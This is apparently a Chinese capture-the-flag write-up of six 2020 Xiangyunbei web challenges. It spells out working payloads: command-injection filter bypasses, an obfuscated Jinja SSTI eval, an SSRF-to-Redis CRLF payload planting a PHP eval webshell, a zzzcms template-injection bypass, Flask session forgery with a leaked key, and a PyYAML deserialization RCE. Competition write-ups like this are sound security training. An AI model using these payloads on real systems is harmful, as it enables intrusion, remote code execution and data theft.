Skip to content

2020祥云杯Web Wp

Web:

PING | SLOVED | working :crazyman Neorah dkk

命令执行 利用%09绕过

?url=|ls%09-all%09/etc 

/etc 下发现.findflag 图片

Base64 和通配符直接绕过读取flag

?url=|base64%09/etc/.findfla?/fla?.txt

图片

flaskbot | SLOVED | Working:dkk

利用Pythonnan绕过二分法算法,name 处有模版注入 和waf

{{lipsum.__globals__.__builtins__.get('\x65\x76\x61\x6c')("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x70\x6f\x70\x65\x6e\x28\x27ls\x27\x29\x2e\x72\x65\x61\x64\x28\x29")}}
绕过waf 命令执行拿到flag

easygogogo| SOLVED | Working:dkk

上传一个../../../../../../../flag

拿到读取flag的Cookie

然后重新开一个靶机 先随便上传一个文件 然后用第一次靶机的Cookie读取到flag

doyouknowssrf |SOLVED | Working:dkk

http://u:[email protected]:[email protected]/ 可以绕过 parse_url,

扫描内网端口

图片

图片

内网5000 有服务 (5000 估计是Python的

图片

Python-urllib/3.7

盲猜CRLF 打redis

图片

果然有Redis服务,直接未授权写PHPshell

payload

http://u:[email protected]:[email protected]/?url=http%253a%252f%252f127.0.0.1%253a6379?q%3dHTTP/1.1%250a%250dheader%3Avalue%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252428%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_GET%255B1%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

图片

拿到shell

easyzzz|SOLVED | Working:dkk

zzzcms的站,利用信息泄露拿到后台,

图片

https://guokeya.github.io/post/mURMabFKM/

keys={if:1)show_source(hex2bin(base_convert(203581841767,10,16)));die();//}{end if}

search 处有waf把if ban了 图片

找1.8.0的代码,找其他标签替换为空绕过if

图片

$payload = "{i{hidestr:}f:1)show_source(hex2bin(base_convert(203581841767,10,16)));die();//}{end i{hidestr:}f}";
echo parserOtherLabel($payload);

profile system | SLOVED | Working:dkk

题目让上传yaml/yml

猜测https://github.com/yaml/pyyaml/issues/420 扫描目录发现 500的 /uploads/dump.sql

图片

感觉有任意文件读取

图片

读到app.py

拿KEY伪造Session

python flask_session_cookie_manager3.py encode -t '{"filename":"5.yaml","priviledge":"elite"}' -s "Th1s_is_A_Sup333er_s1cret_k1yyyyy"

上传https://github.com/yaml/pyyaml/issues/420yaml RCE文件,把shell写到uploads静态目录

!!python/object/new:tuple 
- !!python/object/new:map 
  - !!python/name:eval
  - ["\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x22\x2f\x72\x65\x61\x64\x66\x6c\x61\x67\x20\x2f\x20\x3e\x20\x75\x70\x6c\x6f\x61\x64\x73\x2f\x32\x2e\x74\x78\x74\x22\x29"]

图片

图片


Last update: 2021-04-25